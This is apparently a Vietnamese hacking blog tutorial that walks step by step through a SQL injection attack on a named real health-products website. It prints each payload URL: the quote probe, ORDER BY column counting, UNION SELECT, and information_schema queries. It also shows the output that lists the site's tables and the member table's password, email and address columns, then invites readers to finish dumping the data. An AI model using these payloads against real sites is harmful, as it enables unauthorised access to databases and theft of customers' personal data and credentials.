Hôm nay mình làm cho ae cái tut mới
Khai thác sql dạng HTML
[COLOR=red]victim lần này là:
http://www.worldwidehealthcenter.net/articles-261.html
Thêm dấu ' vào sau những con số
http://www.worldwidehealthcenter.net/articles-261'.html
haha lỗi rồi
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/whc/www/articles.php on line 16
Warning: Cannot modify header information - headers already sent by (output started at /home/whc/www/articles.php:16) in /home/whc/www/include.php on line 432
Bắt đầu order by
http://www.worldwidehealthcenter.net/articles-261 order by 1-- -.html >>ok
http://www.worldwidehealthcenter.net/articles-261 order by 7-- -.html >> ok
http://www.worldwidehealthcenter.net/articles-261 order by 8-- -.html >> bao loi
>>8-1=7 nhé
bây h union select :
http://www.worldwidehealthcenter.net/articles-261 union select 1,2,3,4,5,6,7-- -.html
ui số má đâu hết rồi: , view source , chẳng thấy gì hết chán.
Ghét quá thay số bằng null xem 261=null
http://www.worldwidehealthcenter.net/articles-null union select 1,2,3,4,5,6,7-- -.html
ui ra rồi 2 và 3 nhé
Tìm các thông tin :version(),database(),user()
[/COLOR]http://www.worldwidehealthcenter.net/articles-null union select 1,2,version(),4,5,6,7-- -.html
[COLOR=red]Tiếp theo tìm table name
[/COLOR]http://www.worldwidehealthcenter.net/articles-null union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()-- -.html
[COLOR=red]1 đống :
adprice,artcat,articles,banners,brands,bulktemp,ca tegories,clickthrus,concerns,countries,directory,d irectorybak,directorystats,discount,distributorord er,emailaddresses,exchange,iptoc,keywords,loyalty, member,memberbak,memberbak2,message,ocountries,ord eritems,orders,ordersbak,postal,practcat,products, productsbak,purchaseorders,retaildiscount,ship,shi pdiscount,shipping,states,static,subscribers,suppl iers
Tìm table chứa thông tin
Ở đây nhìu cái quá mình loạn, thôi mình tìm table member nhé
member=0x6d656d626572 (conver to hex nhé)
get column
[/COLOR]http://www.worldwidehealthcenter.net/articles-null union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_schema=database() and table_name=0x6d656d626572-- -.html
[COLOR=red]lại ra 1 đống :
id,password,email,title,firstname,surname,company, address,city,state,postal,shoppercountry,tel,fax,s ameshipadd,shiptitle,shipfirstname,shipsurname,shi pcompany,shipaddress,shipcity,shipstate,country,sh ippostal,shiptel,shipfax,advertise,dateemailed,typ e
Tới đây là được rồi, mọi cái còn lại đơn giản , ae làm nhé
Tut by thanggiangho
Không có nhận xét nào:
Đăng nhận xét